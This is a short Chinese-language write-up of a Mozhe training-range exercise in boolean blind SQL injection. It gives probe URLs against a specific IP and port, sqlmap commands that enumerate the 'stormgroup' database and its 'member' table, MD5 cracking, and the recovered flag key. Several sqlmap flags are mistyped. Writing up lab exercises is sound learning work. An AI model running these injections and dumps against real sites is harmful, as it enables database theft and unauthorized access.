02#墨者靶场-SQL注入漏洞测试(布尔盲注)
墨者学习
By/shy014
1.进入靶场环境发现后台管理页面,尝试弱口令和万能密码失败,抓包查看登陆处也没有发现注入漏洞。
2.仔细查看该页面,发现一个新的链接,点击跳转,发现可能存在注入漏洞。
- 构造如下URL进行测试,确认存在数字型SQL注入漏洞,
- http://219.153.49.228:41979/new_list.php?id=1,有回显
- http://219.153.49.228:41979/new_list.php?id=1’,无回显
- http://219.153.49.228:41979/new_list.php?id=1 and 1=1 ,有回显
- http://219.153.49.228:41979/new_list.php?id=1 and 1=2 ,无回显
3.由于没有找到回显位,所以尝试布尔型盲注入,确定它当前的数据库名长度为10位。
4.直接使用sqlmap
python2 sqlmap.py -u 219.153.49.228:41979/new_list.php?id=1* -techenique=B
5.使用sqlmap读取数据库
python2 sqlmap.py -u 219.153.49.228:41979/new_list.php?id=1* -techenique=B –dbs
6.使用sqlmap读取当前数据库的表
python2 sqlmap.py -u 219.153.49.228:41979/new_list.php?id=1* -techenique=B -D=stormgroup –-tables
7.使用sqlmap读取member表中的字段
python2 sqlmap.py -u 219.153.49.228:41979/new_list.php?id=1* -techenique=B -D stormgroup –T member –columns
8.使用sqlmap读取表中的内容
9.找网站解MD5
10.登陆发现key: mozhe683168a7ed356fe184d15dc8de6